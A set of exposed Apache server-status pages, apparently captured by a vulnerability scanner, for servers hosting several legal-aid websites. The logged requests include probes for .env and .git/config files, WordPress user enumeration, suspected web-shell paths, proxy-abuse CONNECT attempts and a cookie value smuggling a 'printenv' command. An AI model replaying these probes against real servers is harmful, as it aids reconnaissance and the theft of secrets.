0.005945500.00.0038.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-27-0/0/539. 0.005945400.00.0017.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-27109220/48/776_ 6.4919742270.02.2529.19 15.158.40.147http/1.1atlantalegalaid.org:8080GET /api/session?cookie=%7B%22cmd%22%3A%22printenv%22%2C%22toke 15-27109270/79/365_ 7.4688900.02.737.37 130.12.180.82http/1.1atlantalegalaid.org:8080CONNECT www.cloudflare.com:443 HTTP/1.1 16-27-0/0/487. 0.005945900.00.0026.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-27-0/0/174. 0.005945800.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.00162451800.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.00162451700.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00162451600.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00162451500.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00162451400.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00162451200.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00162451300.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.picturingjustice.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979cab7cf62
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 21-Dec-2025 09:26:05 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 27 Parent Server MPM Generation: 26 Server uptime: 25 days 16 hours 49 minutes 14 seconds Server load: 0.00 0.00 0.00 Total accesses: 24204 - Total Traffic: 919.1 MB CPU Usage: u27.43 s2.24 cu0 cs0 - .00134% CPU load .0109 requests/sec - 433 B/second - 38.9 kB/request 1 requests currently being processed, 9 idle workers _________...W................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-2625480/8/2015_ 0.70212730.00.5673.53 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 1-2625450/10/1827_ 2.1026271660.00.2764.92 18.68.28.102http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-2625400/46/1963_ 1.44393600.00.5067.67 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 3-2626020/16/1893_ 2.12211800.00.9278.99 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 4-2625340/12/1881_ 1.1440800.00.1780.82 186.235.250.44http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 5-2632370/11/1657_ 1.55263210.00.5981.63 172.236.228.39http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 6-2633690/8/1943_ 1.08198700.00.4080.75 91.224.92.121http/1.1atlantalegalaid.org:8080OPTIONS / HTTP/1.1 7-2633740/8/1745_ 0.88220320.00.3460.63 3.172.90.72http/1.1elearning.alas.org:8080GET /theme/image.php HTTP/1.1 8-2633790/11/1713_ 1.52148300.00.5357.38 3.172.13.106http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 9-25-0/0/1345. 0.401086390.00.0048.65 130.176.218.136http/1.1cdn.atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 10-25-0/0/1360. 2.07108631430.00.0045.35 15.158.254.235http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766296095.649636030197143 11-24-0/0/1365. 6.3710669100.00.0053.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-26253623/42/1090W 2.690026.51.0137.44 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 13-23-0/0/537. 0.0023637700.00.0017.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-23-0/0/728. 0.5223632400.00.0026.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-23-0/0/286. 0.0023637400.00.004.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-23-0/0/486. 1.8218366400.00.0026.85 149.40.49.208http/1.1 17-21-0/0/173. 3.2737166300.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.00148223500.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.00148223400.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00148223300.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00148223200.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00148223100.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00148222900.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00148223000.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.picturingjustice.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979e819d5b8
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 19-Dec-2025 01:26:00 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 23 days 8 hours 49 minutes 9 seconds Server load: 0.00 0.00 0.00 Total accesses: 21949 - Total Traffic: 839.4 MB CPU Usage: u49.38 s3.93 cu0 cs0 - .00264% CPU load .0109 requests/sec - 435 B/second - 39.2 kB/request 2 requests currently being processed, 8 idle workers ____._..K.___...W............................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-23118410/56/1859_ 6.79232720.02.5967.76 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 1-23172240/4/1625_ 0.3913623710.00.0759.49 130.176.187.246http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-23151370/25/1768_ 2.8086400.00.7460.28 94.26.106.58http/1.1atlantalegalaid.org:8080CONNECT www.google.com:443 HTTP/1.1 3-23118390/134/1711_ 8.33222750.03.3772.69 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 4-23-0/0/1610. 1.49776900.00.0070.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-23151250/18/1518_ 1.4713621480.00.4875.07 15.158.254.235http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766106190.907111883163452 6-23-0/0/1733. 0.19776800.00.0072.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-23-0/0/1601. 3.053472000.00.0054.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-231240411/54/1550K 5.870072.32.0552.02 3.172.5.6http/1.1elearning.alas.org:8080GET /webjars/swagger-ui/index.html HTTP/1.1 9-23-0/0/1198. 0.003477400.00.0045.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-23124090/77/1242_ 4.8086400.03.1742.14 94.26.106.58http/1.1atlantalegalaid.org:8080CONNECT www.cloudflare.com:443 HTTP/1.1 11-23124140/73/1271_ 6.01375200.01.6448.93 15.158.40.136http/1.1elearning.alas.org:8080GET /.env HTTP/1.1 12-23124190/85/870_ 6.53135200.02.5430.40 130.176.208.182http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 13-23-0/0/537. 0.003477200.00.0017.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-23-0/0/728. 0.523471900.00.0026.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-23-0/0/286. 0.003476900.00.004.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-231516323/39/472W 1.800026.60.6926.77 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 17-21-0/0/173. 3.2717005800.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.00128063000.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.00128062900.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00128062800.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00128062700.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00128062600.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00128062400.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00128062500.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.picturingjustice.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979131b2d91
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 16-Dec-2025 16:29:02 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 22 Parent Server MPM Generation: 21 Server uptime: 20 days 23 hours 52 minutes 11 seconds Server load: 0.00 0.00 0.00 Total accesses: 20529 - Total Traffic: 789.5 MB CPU Usage: u33.23 s2.55 cu0 cs0 - .00197% CPU load .0113 requests/sec - 456 B/second - 39.4 kB/request 1 requests currently being processed, 9 idle workers _____..W._.__...._.............................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-21290090/44/1685_ 3.511760.01.6063.30 130.176.137.70http/1.1picturingjustice.org:8080GET / HTTP/1.1 1-21322270/18/1541_ 0.16215500.00.0456.36 130.176.104.242http/1.1elearning.alas.org:8080GET /zxz.php HTTP/1.1 2-21289510/76/1646_ 3.525600.00.7657.00 20.80.104.232http/1.1atlantalegalaid.org:8080GET /hudson HTTP/1.1 3-21289520/37/1523_ 3.3920485360.01.1667.43 130.176.187.246http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 4-21322370/9/1530_ 0.00222770.00.4067.12 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 5-21-0/0/1457. 1.63215300.00.0064.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-21-0/0/1680. 3.24215500.00.0070.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-213099323/52/1500W 0.970026.60.3651.97 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 8-21-0/0/1471. 1.51215600.00.0048.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-21322420/15/1105_ 0.1020481590.00.0244.38 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1765900486.696981906890869 10-21-0/0/1151. 0.00215700.00.0038.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-21322520/8/1162_ 0.00232710.00.3045.60 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 12-21322570/7/775_ 0.0044200.00.0127.79 137.184.238.238http/1.1 13-21-0/0/536. 7.38215400.00.0017.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-20-0/0/724. 0.536318800.00.0026.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-20-0/0/285. 2.985106400.00.004.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-20-0/0/433. 4.113906000.00.0026.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-21289740/40/128_ 2.75215600.00.964.86 130.176.104.214http/1.1elearning.alas.org:8080GET /akcc.php HTTP/1.1 18-8-0/0/6. 0.00107561200.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.00107561100.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00107561000.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00107560900.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00107560800.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00107560600.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00107560700.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.picturingjustice.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979311b7adb
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 14-Dec-2025 06:42:28 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 18 days 14 hours 5 minutes 37 seconds Server load: 0.00 0.00 0.00 Total accesses: 17421 - Total Traffic: 675.9 MB CPU Usage: u23.27 s1.71 cu0 cs0 - .00156% CPU load .0108 requests/sec - 441 B/second - 39.7 kB/request 1 requests currently being processed, 6 idle workers ____....__.W.................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-19140850/2/1472_ 0.0085900.00.0054.73 199.45.154.153http/1.1atlantalegalaid.org:8080GET /security.txt HTTP/1.1 1-19141320/1/1292_ 0.0085811690.00.0047.11 199.45.154.153http/1.1atlantalegalaid.org:8080\x16\x03\x01 2-19141380/1/1366_ 0.00232740.00.4047.43 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 3-19140860/2/1261_ 0.00242730.00.3056.28 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 4-18-0/0/1303. 0.221046470.00.0057.97 3.172.65.164http/1.1elearning.alas.org:8080GET / HTTP/1.1 5-18-0/0/1249. 0.2210463150.00.0055.85 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 6-18-0/0/1429. 0.22104600.00.0062.25 3.131.215.38http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-18-0/0/1283. 0.83822100.00.0046.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-19140910/1/1320_ 0.0086200.00.0043.20 199.45.154.153http/1.1atlantalegalaid.org:8080\x16\x03\x01 9-19140960/1/932_ 0.0086300.00.0037.93 199.45.154.153http/1.1atlantalegalaid.org:8080PRI * HTTP/2.0 10-18-0/0/1016. 2.72864300.00.0033.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-191409923/24/982W 0.000026.60.0338.55 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 12-18-0/0/614. 0.62104600.00.0021.93 3.131.215.38http/1.1atlantalegalaid.org:8080SSH-2.0-Go 13-18-0/0/263. 0.18822200.00.008.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-15-0/0/720. 0.0028719100.00.0026.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-15-0/0/265. 5.9326580400.00.003.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-17-0/0/403. 8.8013846600.00.0024.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-15-0/0/54. 5.2432960800.00.002.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.0086761800.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.0086761700.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.0086761600.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.0086761500.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.0086761400.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.0086761200.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.0086761300.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.picturingjustice.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97940d53e87
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 13-Dec-2025 05:59:54 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 18 Parent Server MPM Generation: 17 Server uptime: 17 days 13 hours 23 minutes 2 seconds Server load: 0.00 0.00 0.00 Total accesses: 16728 - Total Traffic: 650.7 MB CPU Usage: u69.74 s5.37 cu0 cs0 - .00495% CPU load .011 requests/sec - 449 B/second - 39.8 kB/request 1 requests currently being processed, 9 idle workers ___W.______..................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-17307470/45/1418_ 4.96130800.01.6752.52 3.137.73.221http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 1-17311270/44/1220_ 4.73141900.01.7246.08 3.137.73.221http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-17311340/89/1309_ 6.07114800.02.0046.20 3.137.73.221http/1.1atlantalegalaid.org:8080\x16\x03\x01 3-173211223/91/1205W 3.160026.61.0745.68 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 4-17-0/0/1196. 5.322802200.00.0056.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-17307090/91/1211_ 6.29252730.02.5654.65 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 6-17306990/51/1372_ 5.73129500.02.0661.61 3.137.73.221http/1.1atlantalegalaid.org:8080\n 7-1734540/6/1261_ 0.14262720.00.4045.47 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 8-17316500/74/1265_ 3.7394200.02.5040.75 3.137.73.221http/1.1atlantalegalaid.org:8080\x16\x03\x01 9-17316550/35/859_ 3.54106300.01.1336.43 3.137.73.221http/1.1atlantalegalaid.org:8080SSH-2.0-Go 10-1717870/18/983_ 1.40252800.00.4132.27 216.180.246.171http/1.1atlantalegalaid.org:8080GET //webpages/login.html HTTP/1.1 11-17-0/0/935. 3.096812000.00.0037.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-16-0/0/597. 6.989784500.00.0021.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-15-0/0/258. 0.0019823500.00.008.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-15-0/0/720. 0.0019823700.00.0026.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-15-0/0/265. 5.9317685000.00.003.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-17-0/0/403. 8.804951200.00.0024.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-15-0/0/54. 5.2424065400.00.002.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.0077866300.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.0077866200.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.0077866100.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.0077866000.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.0077865900.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.0077865700.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.0077865800.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.picturingjustice.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd9796bae367c
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 01-Dec-2025 04:13:02 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 6 Parent Server MPM Generation: 5 Server uptime: 5 days 11 hours 36 minutes 11 seconds Server load: 0.00 0.00 0.00 Total accesses: 4358 - Total Traffic: 158.0 MB CPU Usage: u17.83 s1.78 cu0 cs0 - .00414% CPU load .0092 requests/sec - 349 B/second - 37.1 kB/request 1 requests currently being processed, 9 idle workers __W_.___.__._................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-549000/58/350_ 1.85979630.00.3410.33 15.158.254.235http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1764562284.303761005401611 1-565090/9/361_ 0.34903260.00.288.73 15.158.254.235http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-5473824/83/407W 1.1200432.30.8710.81 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 3-550500/40/212_ 3.526024280.01.449.14 3.132.23.201http/1.1atlantalegalaid.org:8080\x16\x03\x01 4-5-0/0/319. 0.585759600.00.0010.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-547520/50/298_ 0.68567500.09.5418.37 180.149.126.13http/1.1atlantalegalaid.org:8080GET /c/ HTTP/1.1 6-550590/49/365_ 5.51385900.011.1821.91 3.129.63.56http/1.1atlantalegalaid.org:8080GET /cgi-bin/authLogin.cgi HTTP/1.1 7-563570/73/400_ 0.279011730.01.4111.97 130.176.187.246http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 8-5-0/0/342. 0.005760200.00.009.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-564790/13/189_ 0.15452750.00.569.37 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 10-564840/11/323_ 0.53422800.00.108.80 15.158.40.136http/1.1elearning.alas.org:8080GET /.git/config HTTP/1.1 11-5-0/0/191. 0.005760100.00.007.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-564940/17/238_ 1.31480600.00.517.57 179.1.74.211http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 13-5-0/0/181. 0.005760000.00.006.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-5-0/0/105. 0.005759900.00.003.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-5-0/0/19. 0.005759700.00.000.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-5-0/0/22. 0.005759800.00.001.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-4-0/0/13. 0.9711897700.00.000.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1-0/0/1. 0.0041209100.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-1-0/0/9. 1.2241204900.00.000.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-1-0/0/1. 0.0041209000.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-1-0/0/10. 1.5641205000.00.000.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-1-0/0/1. 0.0041208800.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-1-0/0/1. 0.0041208900.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.picturingjustice.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97914f2e22b
